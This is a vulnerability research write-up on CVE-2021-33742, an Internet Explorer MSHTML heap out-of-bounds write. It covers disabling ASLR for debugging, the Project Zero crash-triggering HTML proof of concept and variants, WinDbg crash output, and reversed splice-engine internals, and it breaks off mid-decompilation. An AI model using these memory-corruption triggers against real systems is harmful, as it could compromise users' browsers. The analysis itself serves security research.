CVE-2021-33742: Analysis of the Internet Explorer MSHTML Heap Out-of-Bounds Write Vulnerability

 

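Vulnerability Background

On July 14, 2021, Google's Threat Analysis Group (TAG) published an article titled "How We Protect Users From 0-Day Attacks". The article disclosed details of four 0-day vulnerabilities that TAG had found being exploited in the wild in 2021: CVE-2021-21166 and CVE-2021-30551 in Google Chrome, CVE-2021-33742 in Internet Explorer, and CVE-2021-1879 in Apple Safari.

In April 2021, TAG discovered a campaign targeting Armenian users. The attackers used malicious Office documents to make Internet Explorer load a remote malicious web page, which exploited a vulnerability in Internet Explorer's rendering engine. The documents either embedded a remote ActiveX object through a Shell.Explorer.1 OLE object, or used VBA macros to spawn an Internet Explorer process and navigate it to the malicious page. The vulnerability used in this attack was assigned CVE-2021-33742, and Microsoft fixed it in June 2021.

Microsoft plans to retire Internet Explorer 11 in June 2022 and replace it with its newer browser, Microsoft Edge. For compatibility with older websites, Microsoft Edge includes a built-in Internet Explorer mode. One might therefore assume that researching Internet Explorer vulnerabilities is no longer very worthwhile. However, several Internet Explorer 0-days were still exploited in the wild this year (2021), for example CVE-2021-26411 and CVE-2021-40444, so studying them still has some value.

The vulnerability analyzed here lives in the Trident rendering/layout engine. Even in the latest Windows 11, both the Trident engine (mshtml.dll) and the EdgeHTML engine (edgehtml.dll) are still present. Trident is the layout engine used by Internet Explorer. Its first version shipped with Internet Explorer 4 in October 1997, and new technologies were added to it with each later Internet Explorer release. In Trident 7.0 (used by Internet Explorer 11), Microsoft made major changes to the engine: besides adding new technologies, it also improved support for web standards. EdgeHTML is the proprietary layout engine that Microsoft developed for Microsoft Edge. It is a fork of Trident, but it removed all the legacy code inherited from older Internet Explorer versions and rewrote major parts of the code to interoperate with other modern browsers.

After TAG published the article above, the details of these vulnerabilities were also published on the Google Project Zero blog. This article records my analysis of CVE-2021-33742 in Internet Explorer. I have analyzed vulnerabilities in older versions of Internet Explorer before, but this is my first fairly formal analysis of a vulnerability in a recent version, so please forgive any errors or omissions.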

 

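Vulnerability Overview

CVE-2021-33742 is a heap out-of-bounds write in Internet Explorer's Trident rendering engine (mshtml.dll). It is triggered when JavaScript uses the DOM innerHTML property to set the content (containing a text string) of an inner html element. Changing the content between tags through innerHTML alters the structure of the DOM tree/DOM stream that IE has built, so IE calls functions of the CSpliceTreeEngine class to adjust that structure. When CSpliceTreeEngine::RemoveSplice() removes part of the DOM tree/DOM stream and that part happens to contain a text string, a heap out-of-bounds write can occur.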

 

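Analysis Environment

Locating the Vulnerable Module

64-bit Windows 10 ships both a 32-bit and a 64-bit Internet Explorer, located in "C:\Program Files (x86)\Internet Explorer" and "C:\Program Files\internet explorer" respectively. The corresponding Trident rendering engines (mshtml.dll), however, are located at "C:\Windows\SysWOW64\mshtml.dll" (32-bit) and "C:\Windows\System32\mshtml.dll" (64-bit). A 64-bit operating system can run both 32-bit and 64-bit software: "Program Files (x86)" and "SysWOW64" hold 32-bit modules, while "Program Files" and "System32" hold 64-bit modules. 32-bit programs cannot run natively on a 64-bit system. To run them, Microsoft designed WoW64 (Windows-on-Windows 64-bit), which uses three DLLs (Wow64.dll, Wow64win.dll and Wow64cpu.dll) to switch between 32-bit and 64-bit mode.

For this analysis I used the Trident engine of the 32-bit Internet Explorer, i.e. "C:\Windows\SysWOW64\mshtml.dll".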

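Disabling ASLR

With ASLR disabled, debugging is easier because DLL load addresses no longer change from one debugging session to the next. On Windows 10, exploit mitigations are configured through Windows Defender (Windows Security). Open it, select "App & browser control", find "Exploit protection", and click "Exploit protection settings". Note that the settings page has two tabs, "System settings" and "Program settings". Start with "System settings". The ASLR-related options are "Force randomization for images (Mandatory ASLR)", "Randomize memory allocations (Bottom-up ASLR)" and "High-entropy ASLR". Turn all of them off: first turn off "High-entropy ASLR", then the other two.

"Force randomization for images (Mandatory ASLR)": when Mandatory ASLR is enabled, the load addresses of all modules are randomized, whether or not they were compiled with the "/DYNAMICBASE" option. This includes modules compiled without it. To check whether a module was built with "/DYNAMICBASE", use "Detect It Easy" to see whether the IMAGE_NT_HEADERS -> IMAGE_OPTIONAL_HEADER -> DllCharacteristics -> IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag is set in the PE file.

"Randomize memory allocations (Bottom-up ASLR)": when this option is enabled, the addresses of heap blocks obtained with malloc() or HeapAlloc() are randomized to some degree.

"High-entropy ASLR": this option works together with "Randomize memory allocations (Bottom-up ASLR)". When enabled, it randomizes allocation addresses to a greater degree on top of Bottom-up ASLR.

Next, look at "Program settings". Windows 10 can enable or disable mitigations for individual applications, and these per-program settings override the "System settings". As a result, DLL load addresses may still change even after all ASLR-related mitigations are turned off under "System settings". Switch to the "Program settings" tab, find iexplore.exe, click "Edit", and uncheck "Override system settings" for every ASLR-related setting.

After making these changes, restart the operating system.

Even after this, you may find that module load addresses are still not fixed. In that case, use a hex editor to set the NT Headers -> Optional Header -> DllCharacteristics -> IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE flag in the PE header to 0, then replace the original module with the patched one. This fully disables ASLR for Internet Explorer. I recommend 010 Editor, because its Templates feature makes it easy to modify this flag.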
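The same header patch can also be done in code. The minimal C++ sketch below checks and clears IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (0x0040) in an in-memory copy of a PE file. The helper names are hypothetical. The offsets come from the PE/COFF specification: e_lfanew sits at 0x3C, a 4-byte signature and a 20-byte IMAGE_FILE_HEADER precede the optional header, and DllCharacteristics is at offset 70 of the optional header in both PE32 and PE32+. The sketch flips only that one bit. It does not update the PE checksum or the Authenticode signature, and it assumes you are working on a copy of the file rather than the system file in place.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Offsets from the PE/COFF specification.
constexpr std::size_t kLfanewOffset = 0x3C;       // IMAGE_DOS_HEADER.e_lfanew
constexpr std::size_t kOptHeaderFromNt = 4 + 20;  // "PE\0\0" + IMAGE_FILE_HEADER
constexpr std::size_t kDllCharsInOptHeader = 70;  // same offset for PE32 and PE32+
constexpr uint16_t kDynamicBase = 0x0040;         // IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE

// Reads an n-byte little-endian value; returns false if it would run past the buffer.
static bool ReadLE(const std::vector<uint8_t>& img, std::size_t off, std::size_t n, uint32_t* out) {
    if (off > img.size() || n > img.size() - off) return false;
    uint32_t v = 0;
    for (std::size_t i = 0; i < n; ++i) v |= uint32_t(img[off + i]) << (8 * i);
    *out = v;
    return true;
}

// File offset of OptionalHeader.DllCharacteristics, or 0 if the image looks malformed.
std::size_t DllCharacteristicsOffset(const std::vector<uint8_t>& img) {
    uint32_t mz = 0, ntOff = 0, sig = 0, magic = 0;
    if (!ReadLE(img, 0, 2, &mz) || mz != 0x5A4D) return 0;            // "MZ"
    if (!ReadLE(img, kLfanewOffset, 4, &ntOff)) return 0;
    if (!ReadLE(img, ntOff, 4, &sig) || sig != 0x00004550) return 0;  // "PE\0\0"
    std::size_t opt = std::size_t(ntOff) + kOptHeaderFromNt;
    if (!ReadLE(img, opt, 2, &magic) || (magic != 0x10B && magic != 0x20B)) return 0;
    std::size_t off = opt + kDllCharsInOptHeader;
    uint32_t unused = 0;
    return ReadLE(img, off, 2, &unused) ? off : 0;
}

bool HasDynamicBase(const std::vector<uint8_t>& img) {
    std::size_t off = DllCharacteristicsOffset(img);
    uint32_t chars = 0;
    return off != 0 && ReadLE(img, off, 2, &chars) && (chars & kDynamicBase) != 0;
}

// Clears the flag in place; the PE checksum and Authenticode signature are NOT updated.
bool ClearDynamicBase(std::vector<uint8_t>& img) {
    std::size_t off = DllCharacteristicsOffset(img);
    if (off == 0) return false;
    img[off] = static_cast<uint8_t>(img[off] & ~kDynamicBase);  // 0x40 lives in the low byte
    return true;
}
```

Reading the file into the vector and writing it back out are left out. For a one-off change, 010 Editor's template is still the simpler route.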

 

Reproducing the Vulnerability

I used the PoC provided by Ivan Fratric of Google Project Zero.

<!-- Original PoC -->
<html>
    <head>
        <script>
            var b = document.createElement("html");
            b.innerHTML = Array(40370176).toString();
            b.innerHTML = "";
        </script>
    </head>
    <body>
    </body>
</html>

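The original PoC is so minimal that nothing visible happens when it runs, which made it harder for me to understand the execution flow. I therefore tried the following modified PoCs to observe their effects.

<!-- PoC1: observe the effect -->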
<html>
    <head>
        <script>
            window.onload=function(){
                var b = document.createElement("html");
                document.body.appendChild(b);
                var arr = Array(4);
                for (var i=0;i<4;i++){
                    arr[i] = 'A';
                }
                b.innerHTML = arr.toString();
            }
        </script>
    </head>
    <body>
    </body>
</html>

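The result is as follows:

From this we can draw the following conclusions. The PoC uses the HTML DOM method document.createElement() to create an "html" node (which also creates "head" and "body" nodes) and appends the new "html" node to the existing "body" node. It then creates an Array and initializes it. Finally, it converts the array to a string and, through the HTML DOM innerHTML property, adds that string to the "body" node inside the newly created "html" node.

The original PoC does not initialize the Array it creates. Let's use Chrome's developer tools to see what an uninitialized Array becomes when converted to a string. This will help later, when we look at the in-memory data of the string while debugging the PoC.

As shown, when an initialized Array is converted to a string, its elements are separated by ",". An uninitialized Array converts to a string made up only of "," characters, and the number of commas is the number of elements minus 1.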
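To make the string length concrete, here is a small C++ model of how Array.prototype.toString() joins elements with ",". Elements that were never assigned (holes, modeled here as std::nullopt) contribute empty strings. The function names are illustrative and do not belong to any engine. For the original PoC, Array(40370176).toString() therefore yields 40370175 (0x267FFFF) commas. That count is larger than the biggest value a 25-bit field can hold (0x1FFFFFF), which becomes relevant when CTreeDataPos is discussed later.

```cpp
#include <cassert>
#include <optional>
#include <string>
#include <vector>

// Mimics Array.prototype.join(",") as used by Array.prototype.toString():
// holes (never-assigned elements, std::nullopt here) become empty strings.
std::string JoinLikeJs(const std::vector<std::optional<std::string>>& arr) {
    std::string out;
    for (std::size_t i = 0; i < arr.size(); ++i) {
        if (i != 0) out += ',';
        if (arr[i]) out += *arr[i];
    }
    return out;
}

// Length of Array(n).toString() for a freshly created, unfilled array: n - 1 commas.
unsigned long long UnfilledArrayStringLength(unsigned long long n) {
    return n == 0 ? 0 : n - 1;
}
```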

<!-- PoC2: check whether it still crashes -->
<html>
    <head>
        <script>
            window.onload=function(){
                var b = document.createElement("html");
                document.body.appendChild(b);
                b.innerHTML = Array(40370176).toString();
                b.innerHTML = "";
            }
        </script>
    </head>
    <body>
    </body>
</html>

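Testing shows that PoC2 also crashes. As for the argument to document.createElement(), only "html" triggered the crash in my tests; other tags did not (I am not certain this holds in general).

Now let's reproduce the vulnerability under a debugger, using the original PoC. First, open Internet Explorer and drag the PoC into it. A notification appears: "Internet Explorer restricted this webpage from running scripts or ActiveX controls". This means the JavaScript in the page has not run yet. Next, open WinDbg, attach it to iexplore.exe, and enter the g command to continue. Then click "Allow blocked content" in the Internet Explorer notification (a refresh may be needed). Internet Explorer then raises an exception, which WinDbg catches and breaks on. The crash looks like this: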

(211c.80c): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007ffd`64a43150 cc              int     3
0:015> g
ModLoad: 00000000`70a90000 00000000`70aaf000   C:\Windows\SysWOW64\WLDP.DLL
ModLoad: 00000000`771f0000 00000000`77235000   C:\Windows\SysWOW64\WINTRUST.dll
Invalid parameter passed to C runtime function.
(211c.2320): Access violation - code c0000005 (first chance)  <---- memory access violation
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4e9:
63a46809 66893c50        mov     word ptr [eax+edx*2],di  ds:002b:26e1a024=????
0:004:x86> r
eax=2211a020 ebx=0504cb38 ecx=04915644 edx=02680002 esi=0504ca08 edi=0000fdef
eip=63a46809 esp=0504c7a8 ebp=0504c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4e9:
63a46809 66893c50        mov     word ptr [eax+edx*2],di  ds:002b:26e1a024=????
0:004:x86> !address 26e1a024
Usage:                  Free
Base Address:           00000000`22e1c000
End Address:            00000000`63580000
Region Size:            00000000`40764000 (   1.007 GB)
State:                  00010000          MEM_FREE
Protect:                00000001          PAGE_NOACCESS     <---- not accessible
Type:                   <info not present at the target>
Content source: 0 (invalid), length: 3c765fdc
0:004:x86> k
 # ChildEBP RetAddr  
00 0504c9f0 63a44fe6 MSHTML!CSpliceTreeEngine::RemoveSplice+0x4e9
01 0504cb1c 63b91ff9 MSHTML!Tree::TreeWriter::SpliceTreeInternal+0x8d
02 0504cbf8 63bca8e3 MSHTML!CDoc::CutCopyMove+0x148759
03 0504cc2c 63a80d38 MSHTML!RemoveWithBreakOnEmpty+0x1499bd
04 0504cd7c 63a80a5d MSHTML!InjectHtmlStream+0x29b
05 0504cdc0 63a81a2f MSHTML!HandleHTMLInjection+0x86
06 0504ceb8 63a816a2 MSHTML!CElement::InjectInternal+0x2c9
07 0504cf2c 63a815ba MSHTML!CElement::InjectTextOrHTML+0xdf
08 0504cf58 63a8153c MSHTML!CElement::Var_set_innerHTML+0x51
09 0504cf80 6dd74dae MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_innerHTML+0x3c
0a 0504cfec 6dcfed4e JSCRIPT9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x1de
0b 0504d018 6dcfec9d JSCRIPT9!<lambda_58b9ba9eeb8f97b5e624add39c5039e7>::operator()+0xa0
0c 0504d044 6dcfec21 JSCRIPT9!ThreadContext::ExecuteImplicitCall<<lambda_58b9ba9eeb8f97b5e624add39c5039e7> >+0x73
0d 0504d090 6dc6583c JSCRIPT9!Js::JavascriptOperators::CallSetter+0x4b
0e 0504d0b0 6dc65527 JSCRIPT9!Js::InlineCache::TrySetProperty<1,1,1,1,0>+0x10c
0f 0504d104 6dd6eb85 JSCRIPT9!Js::InterpreterStackFrame::DoProfiledSetProperty<Js::OpLayoutElementCP_OneByte const >+0x97
10 0504d11c 6dccf89b JSCRIPT9!Js::InterpreterStackFrame::OP_ProfiledSetProperty<Js::OpLayoutElementCP_OneByte const >+0x19
11 0504d158 6dcc5208 JSCRIPT9!Js::InterpreterStackFrame::Process+0x1b6b
12 0504d284 007f0fe9 JSCRIPT9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x2a8
WARNING: Frame IP not in any known module. Following frames may be wrong.
13 0504d290 6dd73bb3 0x7f0fe9
14 0504d2d0 6dcfeb62 JSCRIPT9!Js::JavascriptFunction::CallFunction<1>+0x93

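WinDbg's output shows that the PoC triggers a memory access violation with exception code 0xc0000005. The instruction at 0x63a46809 writes a value to an address in a free region (MEM_FREE, PAGE_NOACCESS), which causes the crash. The stack backtrace printed by the k command shows that the faulting code is in MSHTML!CSpliceTreeEngine::RemoveSplice().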
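The faulting address in the dump can be checked by hand. The instruction `mov word ptr [eax+edx*2],di` stores a 16-bit value at eax + 2·edx. Using the register values printed by r:

$$
\texttt{eax} + 2\cdot\texttt{edx} = \texttt{0x2211A020} + 2\times\texttt{0x02680002} = \texttt{0x2211A020} + \texttt{0x04D00004} = \texttt{0x26E1A024}
$$

So the write lands 0x04D00004 bytes (about 77 MiB) past eax, inside the free region reported by !address.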

 

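Structure of the Internet Explorer DOM Tree

When today's web developers think of a DOM tree, they usually picture a tree like this:

Such a tree looks very simple. In reality, however, Internet Explorer's DOM tree implementation is quite complex.

Put simply, the Internet Explorer DOM tree was designed for the web pages of the 1990s. When the original data structures were designed, the web was mainly a document viewer, with at most a few animated GIFs and other static images. The algorithms and data structures therefore closely resembled those behind document viewers such as Microsoft Word. In the early days of the web there was no JavaScript and no way to script page content, so the DOM tree as we know it did not exist. Text was the main content of a web page, and the DOM's internal structure was designed around fast, efficient text storage and manipulation. Web development at the time was characterized by content editing (WYSIWYG: What You See Is What You Get) and by a working model centered on the editing cursor, used for character insertion and limited formatting.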

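A Text-Centric Design

Because of its text-centric design, the original DOM was built on a text backing store: a complex system of text arrays that can split and join text efficiently with minimal or no memory allocation. The backing store represents text (Text) and tags (Tag) as a linear structure addressable by a global index, the character position (CP). Inserting text at a given CP is very efficient, and copying/pasting a range of text is handled centrally by an efficient "splice" operation. The figure below shows how a simple piece of markup containing "hello world" is loaded into the text backing store, and how a CP is assigned to each character and tag.

The text backing store provides special placeholders for non-text entities (such as tags and insertion points).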
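A toy model makes the CP numbering concrete. The sketch below is not IE's CTxtArray. It uses a hypothetical `<p>hello world</p>` and gives every tag one slot and every character one slot, so a slot's index is its CP. Inserting text at a CP shifts every later CP, which is exactly the bookkeeping burden described in the following sections.

```cpp
#include <cassert>
#include <cstddef>
#include <string>
#include <vector>

// One slot per CP: either a tag placeholder or a single character.
struct Slot {
    bool isTag;
    std::string tag;  // e.g. "<p>" for tag slots, empty otherwise
    char ch;          // the character for text slots, '\0' otherwise
};

// Loads tokens ("<...>" = tag, anything else = a run of text) into a linear store.
std::vector<Slot> Load(const std::vector<std::string>& tokens) {
    std::vector<Slot> store;
    for (const std::string& t : tokens) {
        if (!t.empty() && t.front() == '<') {
            store.push_back({true, t, '\0'});
        } else {
            for (char c : t) store.push_back({false, std::string(), c});
        }
    }
    return store;
}

// Inserts text so that its first character gets CP `cp`; every later CP shifts right.
void InsertText(std::vector<Slot>& store, std::size_t cp, const std::string& text) {
    std::vector<Slot> run;
    for (char c : text) run.push_back({false, std::string(), c});
    store.insert(store.begin() + static_cast<std::ptrdiff_t>(cp), run.begin(), run.end());
}
```

With this numbering, `<p>` is CP 0, "hello world" occupies CPs 1 to 11, and `</p>` is CP 12.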

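To store non-text data (such as formatting and grouping information), another set of objects is maintained separately from the backing store: a doubly linked list of tree positions (TreePos objects). TreePos objects are the semantic equivalent of tags in HTML source markup: each logical element is represented by a begin TreePos and an end TreePos. This linear structure makes a depth-first pre-order traversal of the whole DOM tree very fast, and nearly every DOM search API and CSS/layout algorithm needs such a traversal. Later, Microsoft extended TreePos objects with two other kinds of "positions": TreeDataPos (a placeholder for text) and PointerPos (for things such as the editing caret and range boundary points, later also used for new features such as generated content nodes).

Every TreePos object also includes a CP, which acts as a global ordinal index of tags (useful for things like the legacy document.all API). The CP is needed to get from a TreePos into the text backing store. It makes comparing the order of nodes easy, and the length of a piece of text can even be obtained by subtracting CP indices.

To tie it all together, a TreeNode binds a pair of TreePos objects and establishes the "tree" hierarchy expected by the JavaScript DOM, as shown in the figure below: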
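The relationship between TreePos, TreeNode and CP can be sketched in a few lines of C++. This is a simplified model under stated assumptions: the struct names mirror the text, not IE's real classes; GetCp() walks the list in O(n) instead of using the splay tree; and each tag counts as one character.

```cpp
#include <cassert>
#include <cstddef>
#include <string>
#include <vector>

// Simplified TreePos: one entry in the doubly linked list of positions.
struct TreePos {
    enum Kind { NodeBeg, NodeEnd, Text };
    Kind kind;
    std::string label;         // tag name, or the text itself
    TreePos* left = nullptr;   // previous position in document order
    TreePos* right = nullptr;  // next position in document order
};

// A TreeNode binds the begin/end pair of one element.
struct TreeNode {
    TreePos begin;
    TreePos end;
};

// Chains positions into the doubly linked list in the given order.
void Link(const std::vector<TreePos*>& order) {
    for (std::size_t i = 0; i + 1 < order.size(); ++i) {
        order[i]->right = order[i + 1];
        order[i + 1]->left = order[i];
    }
}

// CP of a position = characters before it (a tag counts as 1). O(n) walk;
// IE uses the splay tree to make this fast instead.
long GetCp(const TreePos* tp) {
    long cp = 0;
    for (const TreePos* p = tp->left; p != nullptr; p = p->left)
        cp += (p->kind == TreePos::Text) ? static_cast<long>(p->label.size()) : 1;
    return cp;
}

// Depth-first pre-order traversal is a plain left-to-right walk of the list.
std::vector<std::string> Walk(const TreePos* first) {
    std::vector<std::string> out;
    for (const TreePos* p = first; p != nullptr; p = p->right) {
        if (p->kind == TreePos::NodeBeg) out.push_back("<" + p->label + ">");
        else if (p->kind == TreePos::NodeEnd) out.push_back("</" + p->label + ">");
        else out.push_back(p->label);
    }
    return out;
}
```

For `<p>hello <b>world</b></p>`, `GetCp(&b.end) - GetCp(&b.begin) - 1` gives 5, the length of "world". This is the CP subtraction the text describes.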

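Adding Layers of Complexity

The design of CPs made the original DOM very complex. For the whole system to work correctly, CPs must always be up to date, so they are updated after every DOM operation: entering text, copy/paste, DOM API calls, and even clicking on the page, which sets an insertion point in the DOM. Originally, DOM operations were driven mainly by the HTML parser or by user actions, so a model that always kept CPs up to date was perfectly reasonable. With the rise of JavaScript and DHTML, however, these operations became far more common and frequent.

To maintain the original update speed, new structures were added to the DOM to make updates more efficient. This is how the splay tree came about: a series of overlapping tree links added on top of the TreePos objects. At first, the added complexity improved DOM performance and made global CP updates possible in O(log n) time. However, the splay tree is really optimized only for repeated local searches (for example, changes centered on one position in the DOM tree). It did not prove equally effective for JavaScript and its more random access patterns.

Another consequence of this design was that the "splice" operation mentioned earlier for copy/paste was extended to handle all tree mutations. The core "Splice Engine" works in three steps, as shown in the figure below:

In step 1, the engine "records" the splice information by traversing the tree positions (TreePos) from the start of the operation to its end. It then creates a splice record containing command instructions for this operation (a structure that is reused in the browser's Undo Stack).

In step 2, all nodes associated with the operation (i.e. TreeNode and TreePos objects) are removed from the tree. Note that in the IE DOM tree, TreeNode/TreePos objects are distinct from the Element objects referenced by script, which makes overlapping tags easier to handle. Removing them is therefore not a functional problem.

Finally, in step 3, the splice record is used to "replay" (re-create) new objects at the target position. For example, to complete an appendChild DOM operation, the Splice Engine creates a range around the node (from the TreeNode's begin TreePos to its end TreePos), "splices" this range out of the old position, and creates new nodes to represent the node and its children at the new position. As you can imagine, besides being algorithmically inefficient, this also causes a great deal of memory allocation churn.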
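The record/remove/replay sequence can be sketched over a flat token stream. In this hypothetical model a splice record is simply a copy of the tokens in the range. IE's real records are command instructions over TreePos ranges that also feed the undo stack. Move() corresponds to the appendChild example; a Copy would record and replay without the removal step.

```cpp
#include <cassert>
#include <cstddef>
#include <string>
#include <vector>

using Stream = std::vector<std::string>;

// Step 1: in this model a splice record is a copy of the tokens in [first, last).
struct SpliceRecord {
    Stream tokens;
};

SpliceRecord Record(const Stream& s, std::size_t first, std::size_t last) {
    return SpliceRecord{Stream(s.begin() + static_cast<std::ptrdiff_t>(first),
                               s.begin() + static_cast<std::ptrdiff_t>(last))};
}

// Step 2: remove the original positions from the stream.
void Remove(Stream& s, std::size_t first, std::size_t last) {
    s.erase(s.begin() + static_cast<std::ptrdiff_t>(first),
            s.begin() + static_cast<std::ptrdiff_t>(last));
}

// Step 3: replay the record, creating new tokens at the target.
void Replay(Stream& s, std::size_t target, const SpliceRecord& rec) {
    s.insert(s.begin() + static_cast<std::ptrdiff_t>(target), rec.tokens.begin(), rec.tokens.end());
}

// appendChild-style move; `target` is an index into the stream after removal.
void Move(Stream& s, std::size_t first, std::size_t last, std::size_t target) {
    SpliceRecord rec = Record(s, first, last);
    Remove(s, first, last);
    Replay(s, target, rec);
}
```

Even in this toy, every move allocates a copy of the range and then rebuilds it. This mirrors the memory churn mentioned above.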

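The Original DOM Was Not Encapsulated

These are just a few examples of the complexity of the Internet Explorer DOM. To make matters worse, the original DOM was not encapsulated. Code all the way from the parser to the display system depended on CP/TreePos, and untangling these dependencies took many years of development.

Complexity easily breeds bugs, and the complexity of the DOM code base was a burden on reliability. According to internal investigations, roughly 28% of IE reliability bugs from IE7 to IE11 originated in core DOM components. This complexity also directly hurt IE's agility: every new HTML5 feature became more expensive to implement, because fitting new concepts into the existing architecture became harder.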

 

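Root Cause Analysis

Reversing the Relevant Classes in mshtml.dll

The reversing was done mainly with the help of the pdb file provided by Microsoft and the previously leaked IE5.5 source code.

CSpliceTreeEngine

This class does the actual work for SpliceTree; it is the core class of the Splice Engine described above. SpliceTree can remove (Remove), copy (Copy), move (Move) or undo a remove (Undo a Remove) over a range of the tree. Functions of this class are called whenever the DOM tree changes.

The following are some comments about this class from the IE source code:

Remove:
1. This SpliceTree operation removes all text (Text) in the specified range, together with all elements (Element) that fall entirely within the range.
2. The semantics are such that if an element is not entirely within the range, its end tag (End-Tag) does not move relative to other elements. However, the number of nodes for that element may need to be reduced. When that happens, nodes are removed from the right edge (Right Edge).
3. Pointers without cling (CTreeDataPos) inside the range end up in the space between the begin tags (Begin-Tags) and the end tags (End-Tags); arguably, that is where they belong. Pointers with cling are deleted.

Copy:
1. All text (Text) in the specified range is copied, together with elements (Element) that fall entirely within the range.
2. Elements that overlap the range on the left are copied. Their begin edges (Begin-Edges) are implied at the very start of the range, in the same order in which they appear in the source.
3. Elements that overlap the range on the right are copied. Their end edges (End-Edges) are implied at the very end of the range, in the same order in which they appear in the source.

Move:
1. All text (Text) in the specified range, together with elements (Element) that fall entirely within the range, is moved (removed and inserted at the new position, not copied).
2. Elements that overlap on the right or left are modified using the same rules as Remove, and then copied to the new position using the same rules as Copy.

Undo a Remove:
1. This SpliceTree operation can only be called from the undo code (Undo Code). In essence, it is a Move driven by data saved during a previous Remove. To complicate matters, the saved data must be woven into the tree that already exists.

The following are most of the members of the IE11 CSpliceTreeEngine object that I recovered by reversing.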

//CSpliceTreeEngine object layout (size 0x110, see Tree::TreeWriter::SpliceTreeInternal())

+0x000  bool _fInsert,//CSpliceTreeEngine::Init()
+0x001  bool _fRemove,//CSpliceTreeEngine::Init()
+0x002  bool _fDOMOperation,//CSpliceTreeEngine::Init()
+0x003  //CSpliceTreeEngine::Init(), a flag
+0x004  //CSpliceTreeEngine::Init(), a flag
+0x005  //CSpliceTreeEngine::Init(), a flag
+0x006  //CSpliceTreeEngine::Init(), a flag
+0x007  //CSpliceTreeEngine::Init(), a flag
+0x008  //CSpliceTreeEngine::Init(), a flag
...
+0x00C  CMarkup *_pMarkupSource,//CSpliceTreeEngine::Init()
+0x010  CTreeNode *_pnodeSourceTop,//CSpliceTreeEngine::RecordSplice()
+0x014  CTreePos *_ptpSourceL,//CSpliceTreeEngine::Init()
+0x018  CTreePos *_ptpSourceR,//CSpliceTreeEngine::Init()
+0x01C  CTreeNode *_pnodeSourceL,//CSpliceTreeEngine::RecordSplice()
+0x020  CTreeNode *_pnodeSourceR,//CSpliceTreeEngine::RecordSplice()
+0x024  CMarkup *_pMarkupTarget,//CSpliceTreeEngine::RecordBeginElement()
+0x028  CTreePos * _ptpTarget,//CSpliceTreeEngine::Init()
+0x02C  CTreeNode *_pnodeTarget,//CSpliceTreeEngine::Init()
+0x030  TCHAR* _pchRecord,//CSpliceTreeEngine::InitUndoRemove()
+0x034  LONG _cchRecord,//CSpliceTreeEngine::InitUndoRemove()
+0x038  LONG _cchRecordAlloc,//CSpliceTreeEngine::RecordText()
+0x03C  CSpliceRecord *_prec,//CSpliceTreeEngine::NextRecord()
+0x040  LONG _crec,//CSpliceTreeEngine::NextRecord()
+0x044  WhichAry _cAry,//CSpliceTreeEngine::NextRecord()
+0x048  BOOL _fReversed,//CSpliceTreeEngine::FirstRecord()
+0x04C  CSpliceRecordList* _paryRemoveUndo,//CSpliceTreeEngine::InitUndoRemove()
+0x050  BOOL _fNoFreeRecord,//CSpliceTreeEngine::InitUndoRemove()
+0x054  BOOL Flags,//CSpliceTreeEngine::RecordBeginElement(),Flag,_fNoFreeRecord=0x4
+0x058  CSpliceRecordList* ,//CSpliceTreeEngine::Init(),CSpliceTreeEngine::RecordBeginElement(),CSpliceTreeEngine::~CSpliceTreeEngine()
+0x05C  ,//CSpliceTreeEngine::RemoveSplice(),CSpliceTreeEngine::~CSpliceTreeEngine(), pointer to the memory holding the text
+0x060  CElement **_ppelRight,//CSpliceTreeEngine::RecordBeginElement()
...
+0x070  CSpliceRecordList _aryLeft,//CSpliceTreeEngine::RecordLeftBeginElement(),CSpliceTreeEngine::FirstRecord(),CSpliceTreeEngine::NextRecord(), embedded (not a pointer)
+0x080  CSpliceRecordList _aryInside,//CSpliceTreeEngine::RecordBeginElement(),CSpliceTreeEngine::RecordEndElement(),CSpliceTreeEngine::RecordTextPos(),CSpliceTreeEngine::RecordPointer(),CSpliceTreeEngine::NextRecord(), embedded (not a pointer)
+0x090  CPtrAry<CElement*> _aryElementRight,//CSpliceTreeEngine::CSpliceTreeEngine(),CSpliceTreeEngine::~CSpliceTreeEngine,CSpliceTreeEngine::NoteRightElement(), embedded (not a pointer)
+0x09C  CPtrAry<CElement*> ,//CSpliceTreeEngine::~CSpliceTreeEngine(),CSpliceTreeEngine::RecordSkippedPointer(), embedded (not a pointer)
+0x0A8  CRemoveSpliceUndo _RemoveUndo,//CSpliceTreeEngine::CSpliceTreeEngine(), embedded (not a pointer)
+0x0E4  CInsertSpliceUndo _InsertUndo,//CSpliceTreeEngine::CSpliceTreeEngine(), embedded (not a pointer)

The following is the IE11 CSpliceTreeEngine constructor that I recovered by reversing.

void __thiscall CSpliceTreeEngine::CSpliceTreeEngine(CSpliceTreeEngine *this, CDoc *pDoc)
{
    CSpliceRecordList *aryInside; // ecx
    CRemoveSpliceUndo *pRemoveSpliceUndo; // ecx
    CSpliceRecordList *v5; // edx
    CInsertSpliceUndo *pInsertSpliceUndo; // ecx
    int InitValue; // edx

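    // public: __thiscall CSpliceTreeEngine::CSpliceTreeEngine(class CDoc *)   
    // Purpose: constructor of the CSpliceTreeEngine class
    // Hex-Rays note: v5 and InitValue are both edx, which appears to be 0 here (see the comment below),
    // so the final memset zeroes the first 0x70 bytes of the object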
    this->_aryLeft.ElementCount_Flags = 0;
    this->_aryLeft.MaxElementCount = 0;
    this->_aryLeft.pData = 0;
    aryInside = &this->_aryInside;
    aryInside->ElementCount_Flags = 0;
    aryInside->MaxElementCount = 0;
    aryInside->pData = 0;
    this->_aryLeft.field_C = 1;
    this->_aryLeft.field_D &= 0xFEu;
    aryInside->field_D &= 0xFEu;
    aryInside->field_C = 1;
    memset(&this->_aryElementRight, 0, 0x18u);
    CMarkupUndoBase::CMarkupUndoBase(&this->_RemoveUndo, pDoc, 0, 0);
    pRemoveSpliceUndo->pVtbl = &CRemoveSpliceUndo::`vftable';
    pRemoveSpliceUndo->field_28 = v5;             // 0
    pRemoveSpliceUndo->field_30 = v5;
